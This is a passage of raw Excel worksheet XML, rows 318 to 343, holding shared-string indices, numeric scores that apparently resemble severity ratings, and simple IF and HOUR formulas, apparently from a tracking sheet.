        <v>0</v>
      </c>
      <c r="M318" s="4"/>
      <c r="N318" s="4"/>
      <c r="O318" s="13"/>
      <c r="P318" s="4"/>
      <c r="Q318" s="13">
        <f>HOUR(out!$P318 -out!$N318)</f>
        <v>0</v>
      </c>
      <c r="R318" s="18"/>
      <c r="S318" s="4"/>
      <c r="T318" s="4"/>
      <c r="U318" s="4"/>
      <c r="V318" s="7"/>
    </row>
    <row r="319" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A319" s="3" t="s">
        <v>1934</v>
      </c>
      <c r="B319" s="4" t="s">
        <v>1935</v>
      </c>
      <c r="C319" s="4" t="s">
        <v>1936</v>
      </c>
      <c r="D319" s="4" t="s">
        <v>1937</v>
      </c>
      <c r="E319" s="4" t="s">
        <v>1938</v>
      </c>
      <c r="F319" s="4" t="s">
        <v>1939</v>
      </c>
      <c r="G319" s="4" t="s">
        <v>1940</v>
      </c>
      <c r="H319" s="4">
        <v>6.5</v>
      </c>
      <c r="I319" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J319" s="4"/>
      <c r="K319" s="4"/>
      <c r="L319" s="4">
        <f>IF(out!$G319="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M319" s="4"/>
      <c r="N319" s="4"/>
      <c r="O319" s="13"/>
      <c r="P319" s="4"/>
      <c r="Q319" s="13">
        <f>HOUR(out!$P319 -out!$N319)</f>
        <v>0</v>
      </c>
      <c r="R319" s="18"/>
      <c r="S319" s="4"/>
      <c r="T319" s="4"/>
      <c r="U319" s="4"/>
      <c r="V319" s="7"/>
    </row>
    <row r="320" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A320" s="3" t="s">
        <v>1941</v>
      </c>
      <c r="B320" s="4" t="s">
        <v>1942</v>
      </c>
      <c r="C320" s="4" t="s">
        <v>1943</v>
      </c>
      <c r="D320" s="4" t="s">
        <v>1944</v>
      </c>
      <c r="E320" s="4" t="s">
        <v>1945</v>
      </c>
      <c r="F320" s="4" t="s">
        <v>1946</v>
      </c>
      <c r="G320" s="4" t="s">
        <v>1947</v>
      </c>
      <c r="H320" s="4">
        <v>5.3</v>
      </c>
      <c r="I320" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J320" s="4"/>
      <c r="K320" s="4"/>
      <c r="L320" s="4">
        <f>IF(out!$G320="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M320" s="4"/>
      <c r="N320" s="4"/>
      <c r="O320" s="13"/>
      <c r="P320" s="4"/>
      <c r="Q320" s="13">
        <f>HOUR(out!$P320 -out!$N320)</f>
        <v>0</v>
      </c>
      <c r="R320" s="18"/>
      <c r="S320" s="4"/>
      <c r="T320" s="4"/>
      <c r="U320" s="4"/>
      <c r="V320" s="7"/>
    </row>
    <row r="321" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A321" s="3" t="s">
        <v>1948</v>
      </c>
      <c r="B321" s="4" t="s">
        <v>1949</v>
      </c>
      <c r="C321" s="4" t="s">
        <v>1950</v>
      </c>
      <c r="D321" s="4" t="s">
        <v>1951</v>
      </c>
      <c r="E321" s="4" t="s">
        <v>1952</v>
      </c>
      <c r="F321" s="4" t="s">
        <v>1953</v>
      </c>
      <c r="G321" s="4" t="s">
        <v>1954</v>
      </c>
      <c r="H321" s="4">
        <v>5.3</v>
      </c>
      <c r="I321" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J321" s="4"/>
      <c r="K321" s="4"/>
      <c r="L321" s="4">
        <f>IF(out!$G321="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M321" s="4"/>
      <c r="N321" s="4"/>
      <c r="O321" s="13"/>
      <c r="P321" s="4"/>
      <c r="Q321" s="13">
        <f>HOUR(out!$P321 -out!$N321)</f>
        <v>0</v>
      </c>
      <c r="R321" s="18"/>
      <c r="S321" s="4"/>
      <c r="T321" s="4"/>
      <c r="U321" s="4"/>
      <c r="V321" s="7"/>
    </row>
    <row r="322" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A322" s="3" t="s">
        <v>1955</v>
      </c>
      <c r="B322" s="4" t="s">
        <v>1956</v>
      </c>
      <c r="C322" s="4" t="s">
        <v>1957</v>
      </c>
      <c r="D322" s="4" t="s">
        <v>1958</v>
      </c>
      <c r="E322" s="4" t="s">
        <v>1959</v>
      </c>
      <c r="F322" s="4" t="s">
        <v>1960</v>
      </c>
      <c r="G322" s="4" t="s">
        <v>1961</v>
      </c>
      <c r="H322" s="4">
        <v>3.2</v>
      </c>
      <c r="I322" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J322" s="4"/>
      <c r="K322" s="4"/>
      <c r="L322" s="4">
        <f>IF(out!$G322="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M322" s="4"/>
      <c r="N322" s="4"/>
      <c r="O322" s="13"/>
      <c r="P322" s="4"/>
      <c r="Q322" s="13">
        <f>HOUR(out!$P322 -out!$N322)</f>
        <v>0</v>
      </c>
      <c r="R322" s="18"/>
      <c r="S322" s="4"/>
      <c r="T322" s="4"/>
      <c r="U322" s="4"/>
      <c r="V322" s="7"/>
    </row>
    <row r="323" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A323" s="3" t="s">
        <v>1908</v>
      </c>
      <c r="B323" s="4" t="s">
        <v>1962</v>
      </c>
      <c r="C323" s="4" t="s">
        <v>1963</v>
      </c>
      <c r="D323" s="4" t="s">
        <v>1861</v>
      </c>
      <c r="E323" s="4" t="s">
        <v>1862</v>
      </c>
      <c r="F323" s="4" t="s">
        <v>1964</v>
      </c>
      <c r="G323" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H323" s="4">
        <v>7.2</v>
      </c>
      <c r="I323" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J323" s="4"/>
      <c r="K323" s="4"/>
      <c r="L323" s="4">
        <f>IF(out!$G323="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M323" s="4"/>
      <c r="N323" s="4"/>
      <c r="O323" s="13"/>
      <c r="P323" s="4"/>
      <c r="Q323" s="13">
        <f>HOUR(out!$P323 -out!$N323)</f>
        <v>0</v>
      </c>
      <c r="R323" s="18"/>
      <c r="S323" s="4"/>
      <c r="T323" s="4"/>
      <c r="U323" s="4"/>
      <c r="V323" s="7"/>
    </row>
    <row r="324" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A324" s="3" t="s">
        <v>1965</v>
      </c>
      <c r="B324" s="4" t="s">
        <v>1966</v>
      </c>
      <c r="C324" s="4" t="s">
        <v>1967</v>
      </c>
      <c r="D324" s="4" t="s">
        <v>1861</v>
      </c>
      <c r="E324" s="4" t="s">
        <v>1862</v>
      </c>
      <c r="F324" s="4" t="s">
        <v>1968</v>
      </c>
      <c r="G324" s="4" t="s">
        <v>1969</v>
      </c>
      <c r="H324" s="4">
        <v>7.2</v>
      </c>
      <c r="I324" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J324" s="4"/>
      <c r="K324" s="4"/>
      <c r="L324" s="4">
        <f>IF(out!$G324="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M324" s="4"/>
      <c r="N324" s="4"/>
      <c r="O324" s="13"/>
      <c r="P324" s="4"/>
      <c r="Q324" s="13">
        <f>HOUR(out!$P324 -out!$N324)</f>
        <v>0</v>
      </c>
      <c r="R324" s="18"/>
      <c r="S324" s="4"/>
      <c r="T324" s="4"/>
      <c r="U324" s="4"/>
      <c r="V324" s="7"/>
    </row>
    <row r="325" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A325" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B325" s="4" t="s">
        <v>1970</v>
      </c>
      <c r="C325" s="4" t="s">
        <v>1971</v>
      </c>
      <c r="D325" s="4" t="s">
        <v>1972</v>
      </c>
      <c r="E325" s="4" t="s">
        <v>1973</v>
      </c>
      <c r="F325" s="4" t="s">
        <v>1974</v>
      </c>
      <c r="G325" s="4" t="s">
        <v>1975</v>
      </c>
      <c r="H325" s="4">
        <v>6.5</v>
      </c>
      <c r="I325" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J325" s="4"/>
      <c r="K325" s="4"/>
      <c r="L325" s="4">
        <f>IF(out!$G325="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M325" s="4"/>
      <c r="N325" s="4"/>
      <c r="O325" s="13"/>
      <c r="P325" s="4"/>
      <c r="Q325" s="13">
        <f>HOUR(out!$P325 -out!$N325)</f>
        <v>0</v>
      </c>
      <c r="R325" s="18"/>
      <c r="S325" s="4"/>
      <c r="T325" s="4"/>
      <c r="U325" s="4"/>
      <c r="V325" s="7"/>
    </row>
    <row r="326" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A326" s="3" t="s">
        <v>1976</v>
      </c>
      <c r="B326" s="4" t="s">
        <v>1977</v>
      </c>
      <c r="C326" s="4" t="s">
        <v>1978</v>
      </c>
      <c r="D326" s="4" t="s">
        <v>1979</v>
      </c>
      <c r="E326" s="4" t="s">
        <v>1980</v>
      </c>
      <c r="F326" s="4" t="s">
        <v>1981</v>
      </c>
      <c r="G326" s="4" t="s">
        <v>1982</v>
      </c>
      <c r="H326" s="4">
        <v>6.1</v>
      </c>
      <c r="I326" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J326" s="4"/>
      <c r="K326" s="4"/>
      <c r="L326" s="4">
        <f>IF(out!$G326="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M326" s="4"/>
      <c r="N326" s="4"/>
      <c r="O326" s="13"/>
      <c r="P326" s="4"/>
      <c r="Q326" s="13">
        <f>HOUR(out!$P326 -out!$N326)</f>
        <v>0</v>
      </c>
      <c r="R326" s="18"/>
      <c r="S326" s="4"/>
      <c r="T326" s="4"/>
      <c r="U326" s="4"/>
      <c r="V326" s="7"/>
    </row>
    <row r="327" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A327" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B327" s="4" t="s">
        <v>1983</v>
      </c>
      <c r="C327" s="4" t="s">
        <v>1984</v>
      </c>
      <c r="D327" s="4" t="s">
        <v>1972</v>
      </c>
      <c r="E327" s="4" t="s">
        <v>1973</v>
      </c>
      <c r="F327" s="4" t="s">
        <v>1985</v>
      </c>
      <c r="G327" s="4" t="s">
        <v>1986</v>
      </c>
      <c r="H327" s="4">
        <v>6.5</v>
      </c>
      <c r="I327" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J327" s="4"/>
      <c r="K327" s="4"/>
      <c r="L327" s="4">
        <f>IF(out!$G327="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M327" s="4"/>
      <c r="N327" s="4"/>
      <c r="O327" s="13"/>
      <c r="P327" s="4"/>
      <c r="Q327" s="13">
        <f>HOUR(out!$P327 -out!$N327)</f>
        <v>0</v>
      </c>
      <c r="R327" s="18"/>
      <c r="S327" s="4"/>
      <c r="T327" s="4"/>
      <c r="U327" s="4"/>
      <c r="V327" s="7"/>
    </row>
    <row r="328" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A328" s="3" t="s">
        <v>1987</v>
      </c>
      <c r="B328" s="4" t="s">
        <v>1988</v>
      </c>
      <c r="C328" s="4" t="s">
        <v>1989</v>
      </c>
      <c r="D328" s="4" t="s">
        <v>1990</v>
      </c>
      <c r="E328" s="4" t="s">
        <v>1991</v>
      </c>
      <c r="F328" s="4" t="s">
        <v>1992</v>
      </c>
      <c r="G328" s="4" t="s">
        <v>1993</v>
      </c>
      <c r="H328" s="4">
        <v>8.6999999999999993</v>
      </c>
      <c r="I328" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J328" s="4"/>
      <c r="K328" s="4"/>
      <c r="L328" s="4">
        <f>IF(out!$G328="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M328" s="4"/>
      <c r="N328" s="4"/>
      <c r="O328" s="13"/>
      <c r="P328" s="4"/>
      <c r="Q328" s="13">
        <f>HOUR(out!$P328 -out!$N328)</f>
        <v>0</v>
      </c>
      <c r="R328" s="18"/>
      <c r="S328" s="4"/>
      <c r="T328" s="4"/>
      <c r="U328" s="4"/>
      <c r="V328" s="7"/>
    </row>
    <row r="329" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A329" s="3" t="s">
        <v>1994</v>
      </c>
      <c r="B329" s="4" t="s">
        <v>1995</v>
      </c>
      <c r="C329" s="4" t="s">
        <v>1996</v>
      </c>
      <c r="D329" s="4" t="s">
        <v>1997</v>
      </c>
      <c r="E329" s="4" t="s">
        <v>1998</v>
      </c>
      <c r="F329" s="4" t="s">
        <v>1999</v>
      </c>
      <c r="G329" s="4" t="s">
        <v>2000</v>
      </c>
      <c r="H329" s="4">
        <v>4.3</v>
      </c>
      <c r="I329" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J329" s="4"/>
      <c r="K329" s="4"/>
      <c r="L329" s="4">
        <f>IF(out!$G329="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M329" s="4"/>
      <c r="N329" s="4"/>
      <c r="O329" s="13"/>
      <c r="P329" s="4"/>
      <c r="Q329" s="13">
        <f>HOUR(out!$P329 -out!$N329)</f>
        <v>0</v>
      </c>
      <c r="R329" s="18"/>
      <c r="S329" s="4"/>
      <c r="T329" s="4"/>
      <c r="U329" s="4"/>
      <c r="V329" s="7"/>
    </row>
    <row r="330" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A330" s="3" t="s">
        <v>2001</v>
      </c>
      <c r="B330" s="4" t="s">
        <v>2002</v>
      </c>
      <c r="C330" s="4" t="s">
        <v>2003</v>
      </c>
      <c r="D330" s="4" t="s">
        <v>2004</v>
      </c>
      <c r="E330" s="4" t="s">
        <v>2005</v>
      </c>
      <c r="F330" s="4" t="s">
        <v>2006</v>
      </c>
      <c r="G330" s="4" t="s">
        <v>2007</v>
      </c>
      <c r="H330" s="4">
        <v>4.7</v>
      </c>
      <c r="I330" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J330" s="4"/>
      <c r="K330" s="4"/>
      <c r="L330" s="4">
        <f>IF(out!$G330="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M330" s="4"/>
      <c r="N330" s="4"/>
      <c r="O330" s="13"/>
      <c r="P330" s="4"/>
      <c r="Q330" s="13">
        <f>HOUR(out!$P330 -out!$N330)</f>
        <v>0</v>
      </c>
      <c r="R330" s="18"/>
      <c r="S330" s="4"/>
      <c r="T330" s="4"/>
      <c r="U330" s="4"/>
      <c r="V330" s="7"/>
    </row>
    <row r="331" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A331" s="3" t="s">
        <v>2008</v>
      </c>
      <c r="B331" s="4" t="s">
        <v>2009</v>
      </c>
      <c r="C331" s="4" t="s">
        <v>2010</v>
      </c>
      <c r="D331" s="4" t="s">
        <v>2011</v>
      </c>
      <c r="E331" s="4" t="s">
        <v>2012</v>
      </c>
      <c r="F331" s="4" t="s">
        <v>416</v>
      </c>
      <c r="G331" s="4" t="s">
        <v>2013</v>
      </c>
      <c r="H331" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I331" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J331" s="4"/>
      <c r="K331" s="4"/>
      <c r="L331" s="4">
        <f>IF(out!$G331="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M331" s="4"/>
      <c r="N331" s="4"/>
      <c r="O331" s="13"/>
      <c r="P331" s="4"/>
      <c r="Q331" s="13">
        <f>HOUR(out!$P331 -out!$N331)</f>
        <v>0</v>
      </c>
      <c r="R331" s="18"/>
      <c r="S331" s="4"/>
      <c r="T331" s="4"/>
      <c r="U331" s="4"/>
      <c r="V331" s="7"/>
    </row>
    <row r="332" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A332" s="3" t="s">
        <v>2014</v>
      </c>
      <c r="B332" s="4" t="s">
        <v>2015</v>
      </c>
      <c r="C332" s="4" t="s">
        <v>2016</v>
      </c>
      <c r="D332" s="4" t="s">
        <v>2017</v>
      </c>
      <c r="E332" s="4" t="s">
        <v>2018</v>
      </c>
      <c r="F332" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G332" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H332" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I332" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J332" s="4"/>
      <c r="K332" s="4"/>
      <c r="L332" s="4">
        <f>IF(out!$G332="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M332" s="4"/>
      <c r="N332" s="4"/>
      <c r="O332" s="13"/>
      <c r="P332" s="4"/>
      <c r="Q332" s="13">
        <f>HOUR(out!$P332 -out!$N332)</f>
        <v>0</v>
      </c>
      <c r="R332" s="18"/>
      <c r="S332" s="4"/>
      <c r="T332" s="4"/>
      <c r="U332" s="4"/>
      <c r="V332" s="7"/>
    </row>
    <row r="333" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A333" s="3" t="s">
        <v>2019</v>
      </c>
      <c r="B333" s="4" t="s">
        <v>2020</v>
      </c>
      <c r="C333" s="4" t="s">
        <v>2021</v>
      </c>
      <c r="D333" s="4" t="s">
        <v>2022</v>
      </c>
      <c r="E333" s="4" t="s">
        <v>2023</v>
      </c>
      <c r="F333" s="4" t="s">
        <v>2024</v>
      </c>
      <c r="G333" s="4" t="s">
        <v>2025</v>
      </c>
      <c r="H333" s="4">
        <v>9.1</v>
      </c>
      <c r="I333" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J333" s="4"/>
      <c r="K333" s="4"/>
      <c r="L333" s="4">
        <f>IF(out!$G333="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M333" s="4"/>
      <c r="N333" s="4"/>
      <c r="O333" s="13"/>
      <c r="P333" s="4"/>
      <c r="Q333" s="13">
        <f>HOUR(out!$P333 -out!$N333)</f>
        <v>0</v>
      </c>
      <c r="R333" s="18"/>
      <c r="S333" s="4"/>
      <c r="T333" s="4"/>
      <c r="U333" s="4"/>
      <c r="V333" s="7"/>
    </row>
    <row r="334" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A334" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B334" s="4" t="s">
        <v>2026</v>
      </c>
      <c r="C334" s="4" t="s">
        <v>2027</v>
      </c>
      <c r="D334" s="4" t="s">
        <v>2028</v>
      </c>
      <c r="E334" s="4" t="s">
        <v>2029</v>
      </c>
      <c r="F334" s="4" t="s">
        <v>1539</v>
      </c>
      <c r="G334" s="4" t="s">
        <v>2013</v>
      </c>
      <c r="H334" s="4">
        <v>7.1</v>
      </c>
      <c r="I334" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J334" s="4"/>
      <c r="K334" s="4"/>
      <c r="L334" s="4">
        <f>IF(out!$G334="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M334" s="4"/>
      <c r="N334" s="4"/>
      <c r="O334" s="13"/>
      <c r="P334" s="4"/>
      <c r="Q334" s="13">
        <f>HOUR(out!$P334 -out!$N334)</f>
        <v>0</v>
      </c>
      <c r="R334" s="18"/>
      <c r="S334" s="4"/>
      <c r="T334" s="4"/>
      <c r="U334" s="4"/>
      <c r="V334" s="7"/>
    </row>
    <row r="335" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A335" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B335" s="4" t="s">
        <v>2030</v>
      </c>
      <c r="C335" s="4" t="s">
        <v>2031</v>
      </c>
      <c r="D335" s="4" t="s">
        <v>2032</v>
      </c>
      <c r="E335" s="4" t="s">
        <v>2033</v>
      </c>
      <c r="F335" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G335" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H335" s="4">
        <v>7.1</v>
      </c>
      <c r="I335" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J335" s="4"/>
      <c r="K335" s="4"/>
      <c r="L335" s="4">
        <f>IF(out!$G335="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M335" s="4"/>
      <c r="N335" s="4"/>
      <c r="O335" s="13"/>
      <c r="P335" s="4"/>
      <c r="Q335" s="13">
        <f>HOUR(out!$P335 -out!$N335)</f>
        <v>0</v>
      </c>
      <c r="R335" s="18"/>
      <c r="S335" s="4"/>
      <c r="T335" s="4"/>
      <c r="U335" s="4"/>
      <c r="V335" s="7"/>
    </row>
    <row r="336" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A336" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B336" s="4" t="s">
        <v>2034</v>
      </c>
      <c r="C336" s="4" t="s">
        <v>2035</v>
      </c>
      <c r="D336" s="4" t="s">
        <v>2036</v>
      </c>
      <c r="E336" s="4" t="s">
        <v>2037</v>
      </c>
      <c r="F336" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G336" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H336" s="4">
        <v>7.1</v>
      </c>
      <c r="I336" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J336" s="4"/>
      <c r="K336" s="4"/>
      <c r="L336" s="4">
        <f>IF(out!$G336="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M336" s="4"/>
      <c r="N336" s="4"/>
      <c r="O336" s="13"/>
      <c r="P336" s="4"/>
      <c r="Q336" s="13">
        <f>HOUR(out!$P336 -out!$N336)</f>
        <v>0</v>
      </c>
      <c r="R336" s="18"/>
      <c r="S336" s="4"/>
      <c r="T336" s="4"/>
      <c r="U336" s="4"/>
      <c r="V336" s="7"/>
    </row>
    <row r="337" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A337" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B337" s="4" t="s">
        <v>2038</v>
      </c>
      <c r="C337" s="4" t="s">
        <v>2039</v>
      </c>
      <c r="D337" s="4" t="s">
        <v>2040</v>
      </c>
      <c r="E337" s="4" t="s">
        <v>2041</v>
      </c>
      <c r="F337" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G337" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H337" s="4">
        <v>7.1</v>
      </c>
      <c r="I337" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J337" s="4"/>
      <c r="K337" s="4"/>
      <c r="L337" s="4">
        <f>IF(out!$G337="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M337" s="4"/>
      <c r="N337" s="4"/>
      <c r="O337" s="13"/>
      <c r="P337" s="4"/>
      <c r="Q337" s="13">
        <f>HOUR(out!$P337 -out!$N337)</f>
        <v>0</v>
      </c>
      <c r="R337" s="18"/>
      <c r="S337" s="4"/>
      <c r="T337" s="4"/>
      <c r="U337" s="4"/>
      <c r="V337" s="7"/>
    </row>
    <row r="338" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A338" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B338" s="4" t="s">
        <v>2042</v>
      </c>
      <c r="C338" s="4" t="s">
        <v>2043</v>
      </c>
      <c r="D338" s="4" t="s">
        <v>2044</v>
      </c>
      <c r="E338" s="4" t="s">
        <v>2045</v>
      </c>
      <c r="F338" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G338" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H338" s="4">
        <v>7.1</v>
      </c>
      <c r="I338" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J338" s="4"/>
      <c r="K338" s="4"/>
      <c r="L338" s="4">
        <f>IF(out!$G338="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M338" s="4"/>
      <c r="N338" s="4"/>
      <c r="O338" s="13"/>
      <c r="P338" s="4"/>
      <c r="Q338" s="13">
        <f>HOUR(out!$P338 -out!$N338)</f>
        <v>0</v>
      </c>
      <c r="R338" s="18"/>
      <c r="S338" s="4"/>
      <c r="T338" s="4"/>
      <c r="U338" s="4"/>
      <c r="V338" s="7"/>
    </row>
    <row r="339" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A339" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B339" s="4" t="s">
        <v>2046</v>
      </c>
      <c r="C339" s="4" t="s">
        <v>2047</v>
      </c>
      <c r="D339" s="4" t="s">
        <v>2048</v>
      </c>
      <c r="E339" s="4" t="s">
        <v>2049</v>
      </c>
      <c r="F339" s="4" t="s">
        <v>2050</v>
      </c>
      <c r="G339" s="4" t="s">
        <v>2051</v>
      </c>
      <c r="H339" s="4">
        <v>7.1</v>
      </c>
      <c r="I339" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J339" s="4"/>
      <c r="K339" s="4"/>
      <c r="L339" s="4">
        <f>IF(out!$G339="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M339" s="4"/>
      <c r="N339" s="4"/>
      <c r="O339" s="13"/>
      <c r="P339" s="4"/>
      <c r="Q339" s="13">
        <f>HOUR(out!$P339 -out!$N339)</f>
        <v>0</v>
      </c>
      <c r="R339" s="18"/>
      <c r="S339" s="4"/>
      <c r="T339" s="4"/>
      <c r="U339" s="4"/>
      <c r="V339" s="7"/>
    </row>
    <row r="340" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A340" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B340" s="4" t="s">
        <v>2052</v>
      </c>
      <c r="C340" s="4" t="s">
        <v>2053</v>
      </c>
      <c r="D340" s="4" t="s">
        <v>2054</v>
      </c>
      <c r="E340" s="4" t="s">
        <v>2055</v>
      </c>
      <c r="F340" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G340" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H340" s="4">
        <v>7.1</v>
      </c>
      <c r="I340" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J340" s="4"/>
      <c r="K340" s="4"/>
      <c r="L340" s="4">
        <f>IF(out!$G340="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M340" s="4"/>
      <c r="N340" s="4"/>
      <c r="O340" s="13"/>
      <c r="P340" s="4"/>
      <c r="Q340" s="13">
        <f>HOUR(out!$P340 -out!$N340)</f>
        <v>0</v>
      </c>
      <c r="R340" s="18"/>
      <c r="S340" s="4"/>
      <c r="T340" s="4"/>
      <c r="U340" s="4"/>
      <c r="V340" s="7"/>
    </row>
    <row r="341" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A341" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B341" s="4" t="s">
        <v>2056</v>
      </c>
      <c r="C341" s="4" t="s">
        <v>2057</v>
      </c>
      <c r="D341" s="4" t="s">
        <v>2058</v>
      </c>
      <c r="E341" s="4" t="s">
        <v>2059</v>
      </c>
      <c r="F341" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G341" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H341" s="4">
        <v>7.1</v>
      </c>
      <c r="I341" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J341" s="4"/>
      <c r="K341" s="4"/>
      <c r="L341" s="4">
        <f>IF(out!$G341="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M341" s="4"/>
      <c r="N341" s="4"/>
      <c r="O341" s="13"/>
      <c r="P341" s="4"/>
      <c r="Q341" s="13">
        <f>HOUR(out!$P341 -out!$N341)</f>
        <v>0</v>
      </c>
      <c r="R341" s="18"/>
      <c r="S341" s="4"/>
      <c r="T341" s="4"/>
      <c r="U341" s="4"/>
      <c r="V341" s="7"/>
    </row>
    <row r="342" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A342" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B342" s="4" t="s">
        <v>2060</v>
      </c>
      <c r="C342" s="4" t="s">
        <v>2061</v>
      </c>
      <c r="D342" s="4" t="s">
        <v>2062</v>
      </c>
      <c r="E342" s="4" t="s">
        <v>2063</v>
      </c>
      <c r="F342" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G342" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H342" s="4">
        <v>7.1</v>
      </c>
      <c r="I342" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J342" s="4"/>
      <c r="K342" s="4"/>
      <c r="L342" s="4">
        <f>IF(out!$G342="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M342" s="4"/>
      <c r="N342" s="4"/>
      <c r="O342" s="13"/>
      <c r="P342" s="4"/>
      <c r="Q342" s="13">
        <f>HOUR(out!$P342 -out!$N342)</f>
        <v>0</v>
      </c>
      <c r="R342" s="18"/>
      <c r="S342" s="4"/>
      <c r="T342" s="4"/>
      <c r="U342" s="4"/>
      <c r="V342" s="7"/>
    </row>
    <row r="343" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A343" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B343" s="4" t="s">
        <v>2064</v>
      </c>
      <c r="C343" s="4" t="s">
        <v>2065</v>
      </c>
      <c r="D343" s="4" t="s">
        <v>2066</v>
      </c>
      <c r="E343" s="4" t="s">
        <v>2067</v>
      </c>
      <c r="F343" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G343" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H343" s="4">
        <v>7.1</v>
      </c>
      <c r="I343" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J343" s="4"/>
      <c r="K343" s="4"/>
      <c r="L343" s="4">
        <f>IF(out!$G343="None",1,0)</f>
